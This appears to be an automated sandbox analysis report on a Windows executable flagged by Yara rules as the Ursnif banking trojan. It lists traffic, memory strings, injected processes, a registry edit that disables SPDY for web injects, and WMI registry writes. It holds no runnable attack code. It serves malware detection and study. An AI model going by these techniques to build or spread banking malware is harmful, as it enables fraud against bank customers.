Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 23 Nov 2021 20:01:39 GMTServer: ApacheContent-Security-Policy: frame-ancestors 'self' *.lycos.comX-Powered-By: PHP/7.2.24Connection: closeTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8

Source: FpYf5EGDO9.exe, 00000000.00000003.351373141.0000000002246000.00000004.00000001.sdmp	String found in binary or memory: *.www.yahoo.com equals www.yahoo.com (Yahoo)
Source: FpYf5EGDO9.exe, 00000000.00000003.351373141.0000000002246000.00000004.00000001.sdmp	String found in binary or memory: *.www.yahoo.com0 equals www.yahoo.com (Yahoo)
Source: FpYf5EGDO9.exe, 00000000.00000003.351373141.0000000002246000.00000004.00000001.sdmp	String found in binary or memory: *.www.yahoo.comT equals www.yahoo.com (Yahoo)
Source: FpYf5EGDO9.exe, 00000000.00000003.450513651.0000000002240000.00000004.00000001.sdmp	String found in binary or memory: +www.yahoo.co equals www.yahoo.com (Yahoo)
Source: FpYf5EGDO9.exe, 00000000.00000003.351373141.0000000002246000.00000004.00000001.sdmp	String found in binary or memory: +www.yahoo.com equals www.yahoo.com (Yahoo)
Source: FpYf5EGDO9.exe, 00000000.00000003.351362297.0000000002289000.00000004.00000001.sdmp	String found in binary or memory: <noscript><META http-equiv="refresh" content="0;URL='https://www.yahoo.com/?err=404&err_url=https%3a%2f%2fwww.yahoo.com%2fjdraw%2fHHAQ457B0GtLskLkv%2fZizh9TthhcPc%2fxT0iS3Qjl7y%2fkpH0MqC4dszB3H%2fHWmjHuRTfALKqcqKHLe5h%2f5KAnfOS4i_2BLVi7%2f2L64u5xwvTf3sXp%2fUrLoeHhSH12GKB9jsQ%2f3izuuqgp_%2f2BeydbeuNgrndFBMAfCQ%2fMxSWsDqksAzA_2F87xp%2fN1In9Bv1C1YQS1KkwHJ10H%2fTNNv.crw'"></noscript> equals www.yahoo.com (Yahoo)
Source: FpYf5EGDO9.exe, 00000000.00000003.351373141.0000000002246000.00000004.00000001.sdmp	String found in binary or memory: https://www.yahoo.com/ GlobalSign Root CA-R2 equals www.yahoo.com (Yahoo)
Source: FpYf5EGDO9.exe, 00000000.00000003.450513651.0000000002240000.00000004.00000001.sdmp	String found in binary or memory: https://www.yahoo.com/ equals www.yahoo.com (Yahoo)
Source: FpYf5EGDO9.exe, 00000000.00000003.351373141.0000000002246000.00000004.00000001.sdmp	String found in binary or memory: https://www.yahoo.com// equals www.yahoo.com (Yahoo)
Source: FpYf5EGDO9.exe, 00000000.00000003.450513651.0000000002240000.00000004.00000001.sdmp	String found in binary or memory: https://www.yahoo.com/R equals www.yahoo.com (Yahoo)
Source: FpYf5EGDO9.exe, 00000000.00000003.351373141.0000000002246000.00000004.00000001.sdmp	String found in binary or memory: https://www.yahoo.com/[ equals www.yahoo.com (Yahoo)
Source: FpYf5EGDO9.exe, 00000000.00000003.450513651.0000000002240000.00000004.00000001.sdmp	String found in binary or memory: https://www.yahoo.com/jdraw/HHAQ457B0GtLskLkv/Zizh9TthhcPc/xT0iS3Qjl7y/kpH0MqC4dszB3H/HWmjHuRTfALKqcqKHLe5h/5KAnfOS4i_2BLVi7/2L64u5xwvTf3sXp/UrLoeHhSH12GKB9jsQ/3izuuqgp_/2BeydbeuNgrndFBMAfCQ/MxSWsDqksAzA_2F87xp/N1In9Bv1C1YQS1KkwHJ10H/TNNv.crw equals www.yahoo.com (Yahoo)
Source: FpYf5EGDO9.exe, 00000000.00000003.351373141.0000000002246000.00000004.00000001.sdmp	String found in binary or memory: https://www.yahoo.com/u equals www.yahoo.com (Yahoo)
Source: FpYf5EGDO9.exe, 00000000.00000003.351362297.0000000002289000.00000004.00000001.sdmp	String found in binary or memory: s://www.yahoo.com/jdraw/HHAQ457B0GtLskLkv/Zizh9TthhcPc/xT0iS3Qjl7y/kpH0MqC4dszB3H/HWmjHuRTfALKqcqKHLe5h/5KAnfOS4i_2BLVi7/2L64u5xwvTf3sXp/UrLoeHhSH12GKB9jsQ/3izuuqgp_/2BeydbeuNgrndFBMAfCQ/MxSWsDqksAzA_2F87xp/N1In9Bv1C1YQS1KkwHJ10H/TNNv.crw equals www.yahoo.com (Yahoo)
Source: FpYf5EGDO9.exe, 00000000.00000003.351373141.0000000002246000.00000004.00000001.sdmp	String found in binary or memory: s://www.yahoo.com/jdraw/HHAQ457B0GtLskLkv/Zizh9TthhcPc/xT0iS3Qjl7y/kpH0MqC4dszB3H/HWmjHuRTfALKqcqKHLe5h/5KAnfOS4i_2BLVi7/2L64u5xwvTf3sXp/UrLoeHhSH12GKB9jsQ/3izuuqgp_/2BeydbeuNgrndFBMAfCQ/MxSWsDqksAzA_2F87xp/N1In9Bv1C1YQS1KkwHJ10H/TNNv.crwv/CCpK equals www.yahoo.com (Yahoo)
Source: FpYf5EGDO9.exe, 00000000.00000003.351373141.0000000002246000.00000004.00000001.sdmp	String found in binary or memory: s://www.yahoo.com/jdraw/HHAQ457B0GtLskLkv/Zizh9TthhcPc/xT0iS3Qjl7y/kpH0MqC4dszB3H/HWmjHuRTfALKqcqKHLe5h/5KAnfOS4i_2BLVi7/2L64u5xwvTf3sXp/UrLoeHhSH12GKB9jsQ/3izuuqgp_/2BeydbeuNgrndFBMAfCQ/MxSWsDqksAzA_2F87xp/N1In9Bv1C1YQS1KkwHJ10H/TNNv.crwx equals www.yahoo.com (Yahoo)
Source: FpYf5EGDO9.exe, 00000000.00000003.450513651.0000000002240000.00000004.00000001.sdmp	String found in binary or memory: var u='https://www.yahoo.com/?err=404&err_url=https%3a%2f%2fwww.yahoo.com%2fj equals www.yahoo.com (Yahoo)
Source: FpYf5EGDO9.exe, 00000000.00000003.351373141.0000000002246000.00000004.00000001.sdmp	String found in binary or memory: var u='https://www.yahoo.com/?err=404&err_url=https%3a%2f%2fwww.yahoo.com%2fjdraw%2fHHAQ457B0GtLskLkv%2fZizh9TthhcPc%2fxT0iS3Qjl7y%2fkpH0MqC4dszB3H%2fHWmjHuRTfALKqcqKHLe5h%2f5KAnfOS4i_2BLVi7%2f2L64u5xwvTf3sXp%2fUrLoeHhSH12GKB9jsQ%2f3izuuqgp_%2f2BeydbeuNgrndFBMAfCQ%2fMxSWsDqksAzA_2F87xp%2fN1In9Bv1C1YQS1KkwHJ10H%2fTNNv.crw'; equals www.yahoo.com (Yahoo)
Source: FpYf5EGDO9.exe, 00000000.00000003.450513651.0000000002240000.00000004.00000001.sdmp	String found in binary or memory: www.yahoo.com equals www.yahoo.com (Yahoo)
Source: FpYf5EGDO9.exe, 00000000.00000003.351373141.0000000002246000.00000004.00000001.sdmp	String found in binary or memory: www.yahoo.com/jdraw/HHAQ457B0GtLskLkv/Zizh9TthhcPc/xT0iS3Qjl7y/kpH0MqC4dszB3H/HWmjHuRTfALKqcqKHLe5h/5KAnfOS4i_2BLVi7/2L64u5xwvTf3sXp/UrLoeHhSH12GKB9jsQ/3izuuqgp_/2BeydbeuNgrndFBMAfCQ/MxSWsDqksAzA_2F87xp/N1In9Bv1C1YQS1KkwHJ10H/TNNv.crw equals www.yahoo.com (Yahoo)
Source: FpYf5EGDO9.exe, 00000000.00000003.351373141.0000000002246000.00000004.00000001.sdmp	String found in binary or memory: www.yahoo.com7 equals www.yahoo.com (Yahoo)
Source: FpYf5EGDO9.exe, 00000000.00000003.450513651.0000000002240000.00000004.00000001.sdmp	String found in binary or memory: www.yahoo.comB equals www.yahoo.com (Yahoo)
Source: FpYf5EGDO9.exe, 00000000.00000003.450513651.0000000002240000.00000004.00000001.sdmp	String found in binary or memory: www.yahoo.comE equals www.yahoo.com (Yahoo)
Source: FpYf5EGDO9.exe, 00000000.00000003.351373141.0000000002246000.00000004.00000001.sdmp	String found in binary or memory: www.yahoo.comZ equals www.yahoo.com (Yahoo)
Source: FpYf5EGDO9.exe, 00000000.00000003.351373141.0000000002246000.00000004.00000001.sdmp	String found in binary or memory: www.yahoo.comows\system32\jsproxy.dll equals www.yahoo.com (Yahoo)
Source: FpYf5EGDO9.exe, 00000000.00000003.450513651.0000000002240000.00000004.00000001.sdmp	String found in binary or memory: www.yahoo.comzD( equals www.yahoo.com (Yahoo)
Source: FpYf5EGDO9.exe, 00000000.00000002.510275033.00000000021CA000.00000004.00000001.sdmp	String found in binary or memory: www.yahoo.com{ equals www.yahoo.com (Yahoo)

Source: unknown	HTTPS traffic detected: 74.6.143.26:443 -> 192.168.2.3:49747 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 87.248.100.216:443 -> 192.168.2.3:49748 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 89.44.9.140:443 -> 192.168.2.3:49751 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 209.202.254.90:443 -> 192.168.2.3:49817 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 209.202.254.90:443 -> 192.168.2.3:49818 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 87.248.118.22:443 -> 192.168.2.3:49820 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 212.82.100.140:443 -> 192.168.2.3:49821 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Yara detected Ursnif

Show sources

Source: Yara match	File source: 0000000E.00000003.484252773.000001A99926C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000002C.00000003.696288190.0000000003DF8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000002C.00000002.698116221.0000000003DF8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000025.00000002.820256805.0000027741E02000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000002.823251492.000001EAE4A02000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000002C.00000003.696063794.0000000003DF8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.397698170.00000000046FC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000002C.00000003.696408888.0000000003DF8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000003.539185713.000001B88940C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000001E.00000002.826107639.000001B91FF02000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.351603382.00000000048F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000002C.00000003.696253842.0000000003DF8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000003.539264556.000001B88940C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000003.463766511.00000227E5BFC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000002.540966391.000001B88940C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.397157084.00000000048F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.351549542.00000000048F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.449933365.0000000005C38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.351505235.00000000048F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.542615243.00000227E5BFC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000003.531429519.00000227E5BFC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000002.829961859.00000163C5A02000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000002C.00000003.696348362.0000000003DF8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000002C.00000003.696117374.0000000003DF8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000003.463832492.00000227E5BFC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.351619714.00000000048F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000002C.00000003.696320291.0000000003DF8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000002C.00000003.696213478.0000000003DF8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.396094392.00000000048F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.351527418.00000000048F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.351580737.00000000048F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000002C.00000003.696160386.0000000003DF8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.351432716.00000000048F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.351478648.00000000048F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: FpYf5EGDO9.exe PID: 5556, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 4856, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: control.exe PID: 2904, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RuntimeBroker.exe PID: 4084, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 6080, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RuntimeBroker.exe PID: 4176, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RuntimeBroker.exe PID: 4440, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RuntimeBroker.exe PID: 4544, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: cmd.exe PID: 6088, type: MEMORYSTR
Source: Yara match	File source: 0.3.FpYf5EGDO9.exe.43394a0.11.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.FpYf5EGDO9.exe.48794a0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.FpYf5EGDO9.exe.47fa4a0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.FpYf5EGDO9.exe.47fa4a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.FpYf5EGDO9.exe.3c40000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.FpYf5EGDO9.exe.43394a0.11.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.FpYf5EGDO9.exe.48a4ef8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000001F.00000000.537482070.000001B888D00000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000000.646320070.000001EAE4570000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000000.536149519.000001B888D00000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000000.614869233.00000163C5170000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000000.638980317.000001EAE4570000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000000.461568150.0000000000A30000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000025.00000000.658606689.0000027741BA0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.511067245.0000000004500000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000001E.00000000.564696264.000001B920020000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.592498182.000001A99050B000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000000.642623861.000001EAE4570000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001E.00000000.557126032.000001B920020000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.508974340.0000000004339000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000001E.00000000.569957507.000001B920020000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000000.462780080.0000000000A30000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000000.534786772.000001B888D00000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000025.00000000.660520120.0000027741BA0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.397014247.00000000047FA000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.397054517.0000000004879000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000000.601911502.00000163C5170000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000025.00000000.656936601.0000027741BA0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000000.459559350.0000000000A30000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000000.608382094.00000163C5170000.00000040.00020000.sdmp, type: MEMORY

Source: FpYf5EGDO9.exe, 00000000.00000002.510175221.00000000021AA000.00000004.00000020.sdmp

Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

E-Banking Fraud:

Yara detected Ursnif

Show sources

Source: Yara match	File source: 0000000E.00000003.484252773.000001A99926C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000002C.00000003.696288190.0000000003DF8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000002C.00000002.698116221.0000000003DF8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000025.00000002.820256805.0000027741E02000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000002.823251492.000001EAE4A02000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000002C.00000003.696063794.0000000003DF8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.397698170.00000000046FC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000002C.00000003.696408888.0000000003DF8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000003.539185713.000001B88940C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000001E.00000002.826107639.000001B91FF02000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.351603382.00000000048F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000002C.00000003.696253842.0000000003DF8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000003.539264556.000001B88940C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000003.463766511.00000227E5BFC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000002.540966391.000001B88940C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.397157084.00000000048F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.351549542.00000000048F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.449933365.0000000005C38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.351505235.00000000048F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.542615243.00000227E5BFC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000003.531429519.00000227E5BFC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000002.829961859.00000163C5A02000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000002C.00000003.696348362.0000000003DF8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000002C.00000003.696117374.0000000003DF8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000003.463832492.00000227E5BFC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.351619714.00000000048F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000002C.00000003.696320291.0000000003DF8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000002C.00000003.696213478.0000000003DF8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.396094392.00000000048F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.351527418.00000000048F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.351580737.00000000048F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000002C.00000003.696160386.0000000003DF8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.351432716.00000000048F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.351478648.00000000048F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: FpYf5EGDO9.exe PID: 5556, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 4856, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: control.exe PID: 2904, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RuntimeBroker.exe PID: 4084, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 6080, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RuntimeBroker.exe PID: 4176, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RuntimeBroker.exe PID: 4440, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RuntimeBroker.exe PID: 4544, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: cmd.exe PID: 6088, type: MEMORYSTR
Source: Yara match	File source: 0.3.FpYf5EGDO9.exe.43394a0.11.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.FpYf5EGDO9.exe.48794a0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.FpYf5EGDO9.exe.47fa4a0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.FpYf5EGDO9.exe.47fa4a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.FpYf5EGDO9.exe.3c40000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.FpYf5EGDO9.exe.43394a0.11.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.FpYf5EGDO9.exe.48a4ef8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000001F.00000000.537482070.000001B888D00000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000000.646320070.000001EAE4570000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000000.536149519.000001B888D00000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000000.614869233.00000163C5170000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000000.638980317.000001EAE4570000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000000.461568150.0000000000A30000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000025.00000000.658606689.0000027741BA0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.511067245.0000000004500000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000001E.00000000.564696264.000001B920020000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.592498182.000001A99050B000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000000.642623861.000001EAE4570000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001E.00000000.557126032.000001B920020000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.508974340.0000000004339000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000001E.00000000.569957507.000001B920020000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000000.462780080.0000000000A30000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000000.534786772.000001B888D00000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000025.00000000.660520120.0000027741BA0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.397014247.00000000047FA000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.397054517.0000000004879000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000000.601911502.00000163C5170000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000025.00000000.656936601.0000027741BA0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000000.459559350.0000000000A30000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000000.608382094.00000163C5170000.00000040.00020000.sdmp, type: MEMORY

Disables SPDY (HTTP compression, likely to perform web injects)

Show sources

Source: C:\Windows\explorer.exe

Registry key value created / modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings EnableSPDY3_0 0

System Summary:

Writes or reads registry keys via WMI

Show sources

Source: C:\Users\user\Desktop\FpYf5EGDO9.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Users\user\Desktop\FpYf5EGDO9.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Users\user\Desktop\FpYf5EGDO9.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Users\user\Desktop\FpYf5EGDO9.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Users\user\Desktop\FpYf5EGDO9.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::CreateKey
Source: C:\Users\user\Desktop\FpYf5EGDO9.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Users\user\Desktop\FpYf5EGDO9.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Users\user\Desktop\FpYf5EGDO9.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetBinaryValue
Source: C:\Users\user\Desktop\FpYf5EGDO9.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Users\user\Desktop\FpYf5EGDO9.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Users\user\Desktop\FpYf5EGDO9.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue

Writes registry values via WMI

Show sources

Source: C:\Users\user\Desktop\FpYf5EGDO9.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Users\user\Desktop\FpYf5EGDO9.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Users\user\Desktop\FpYf5EGDO9.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Users\user\Desktop\FpYf5EGDO9.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Users\user\Desktop\FpYf5EGDO9.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Users\user\Desktop\FpYf5EGDO9.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Users\user\Desktop\FpYf5EGDO9.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Users\user\Desktop\FpYf5EGDO9.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue

Source: C:\Users\user\Desktop\FpYf5EGDO9.exe	Code function: 0_2_03C4AFC0	0_2_03C4AFC0
Source: C:\Users\user\Desktop\FpYf5EGDO9.exe	Code function: 0_2_03C47FBE	0_2_03C47FBE
Source: C:\Users\user\Desktop\FpYf5EGDO9.exe	Code function: 0_2_03C4836E	0_2_03C4836E
Source: C:\Windows\System32\control.exe	Code function: 21_2_00A559E4	21_2_00A559E4
Source: C:\Windows\System32\control.exe	Code function: 21_2_00A57548	21_2_00A57548
Source: C:\Windows\System32\control.exe	Code function: 21_2_00A3C3E4	21_2_00A3C3E4
Source: C:\Windows\System32\control.exe	Code function: 21_2_00A39098	21_2_00A39098
Source: C:\Windows\System32\control.exe	Code function: 21_2_00A35420	21_2_00A35420
Source: C:\Windows\System32\control.exe	Code function: 21_2_00A4C400	21_2_00A4C400
Source: C:\Windows\System32\control.exe	Code function: 21_2_00A44818	21_2_00A44818
Source: C:\Windows\System32\control.exe	Code function: 21_2_00A50468	21_2_00A50468
Source: C:\Windows\System32\control.exe	Code function: 21_2_00A3847C	21_2_00A3847C
Source: C:\Windows\System32\control.exe	Code function: 21_2_00A41C44	21_2_00A41C44
Source: C:\Windows\System32\control.exe	Code function: 21_2_00A58448	21_2_00A58448
Source: C:\Windows\System32\control.exe	Code function: 21_2_00A365A8	21_2_00A365A8
Source: C:\Windows\System32\control.exe	Code function: 21_2_00A329B0	21_2_00A329B0
Source: C:\Windows\System32\control.exe	Code function: 21_2_00A591B0	21_2_00A591B0
Source: C:\Windows\System32\control.exe	Code function: 21_2_00A4CDC4	21_2_00A4CDC4
Source: C:\Windows\System32\control.exe	Code function: 21_2_00A40DC8	21_2_00A40DC8
Source: C:\Windows\System32\control.exe	Code function: 21_2_00A4B1D0	21_2_00A4B1D0
Source: C:\Windows\System32\control.exe	Code function: 21_2_00A4993C	21_2_00A4993C
Source: C:\Windows\System32\control.exe	Code function: 21_2_00A53D68	21_2_00A53D68
Source: C:\Windows\System32\control.exe	Code function: 21_2_00A48974	21_2_00A48974
